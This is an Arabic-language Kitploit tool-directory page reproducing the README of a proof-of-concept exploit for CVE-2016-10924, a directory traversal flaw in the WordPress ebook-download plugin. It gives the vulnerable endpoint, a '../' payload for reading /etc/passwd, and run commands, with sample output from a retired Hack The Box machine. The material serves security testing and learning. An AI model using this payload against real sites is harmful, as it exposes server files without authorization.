Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2016-10924-POC — سكريبت إثبات المفهوم (PoC) لاستغلال ثغرة اجتياز الدليل (CVE-2016-10924) الموجودة في إضافة ووردبريس ebook-download (الإصدارات الأقل من 1.2). تسمح هذه الثغرة بقراءة ملفات غير مصرح بها عبر طلب GET معدّ. | Kitploit
أدوات/GitHubGitHub/alealeluyah/cve-2016-10924-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubalealeluyah/cve-2016-10924-poc

cve-2016-10924-POC

سكريبت إثبات المفهوم (PoC) لاستغلال ثغرة اجتياز الدليل (CVE-2016-10924) الموجودة في إضافة ووردبريس ebook-download (الإصدارات الأقل من 1.2). تسمح هذه الثغرة بقراءة ملفات غير مصرح بها عبر طلب GET معدّ.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2016-10924-POC

يحتوي هذا المستودع على نص برمجي لإثبات المفهوم (PoC) لاستغلال ثغرة اجتياز الدليل (CVE-2016-10924) الموجودة في إضافة ووردبريس ebook-download (الإصدارات الأقدم من 1.2).

تسمح هذه الثغرة بقراءة ملفات غير مصرح بها عبر طلب GET مخصص. يستغل النص البرمجي معلمة تسمى ebookdownloadurl لاجتياز الأدلة على الخادم المستهدف.

الوصف

  • معرف CVE: CVE-2016-10924
  • نوع الثغرة: اجتياز الدليل
  • المكون المتأثر: إضافة ebook-download للإصدارات < 1.2 لووردبريس
  • التأثير: يمكن للمهاجمين عن بُعد قراءة ملفات عشوائية على نظام التشغيل الأساسي، مثل /etc/passwd، عن طريق التلاعب بمسار الملف في معلمة ebookdownloadurl.

ملاحظة: هذا الإثبات للأغراض التعليمية والاختبار المصرح به فقط. قد يؤدي سوء استخدام هذه المعلومات إلى عواقب قانونية.

المتطلبات

  • بايثون 3.
  • مكتبة requests (يتم تثبيتها عبر pip install requests)

الاستخدام

  1. استنساخ المستودع:

    root@kitploit:~
    git clone https://github.com/your-user/CVE-2016-10924-POC.git
    cd CVE-2016-10924-POC
    
  2. تثبيت التبعيات:

    root@kitploit:~
    pip install requests
    
  3. تشغيل النص البرمجي:

    root@kitploit:~
    python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
    
  4. تحديد مسار الملف المراد قراءته: بعد تشغيل النص البرمجي، سيُطلب منك إدخال مسار ملف. على سبيل المثال:

    root@kitploit:~
    ../../../../../../../../../etc/passwd
    

    قد تحتاج إلى تعديل عدد ../ بناءً على موقع جذر الويب في البيئة المستهدفة.

  5. الخروج:

    • اكتب exit أو quit أو اضغط على Enter في موجه فارغ للخروج.
    • اضغط Ctrl + C لإيقاف النص البرمجي فوراً.

مثال

استخدمت هذا الاستغلال على جهاز "Backdoor"، وهو جهاز متقاعد من Hack The Box:

root@kitploit:~
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] أدخل مسارات الملفات (مثال: ../../../../../etc/passwd). اكتب 'exit' للخروج.

أدخل مسار الملف: ../../../../../../../../../etc/passwd
[*] الرابط المستهدف: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] رمز الحالة: 200
[+] محتوى الملف:
root:x:0:0:root:/root:/bin/bash
...

إخلاء المسؤولية

هذا المشروع مخصص حصراً للأغراض التعليمية والاختبار الأمني المشروع.
لا تستخدم المعلومات أو النصوص البرمجية الموجودة في هذا المستودع على أي نظام ليس لديك إذن صريح لاختباره.
المؤلف والمساهمون غير مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.

الترخيص

هذا المشروع مرخص بموجب رخصة GNU 2.0. يمكنك استخدامه وتعديله بحرية، مع ذكر المصدر.


المراجع

  • NVD - CVE-2016-10924
  • إضافة ووردبريس ebook-download (للإشارة إلى الإصدارات المعرضة للخطر)
تنزيل الأداة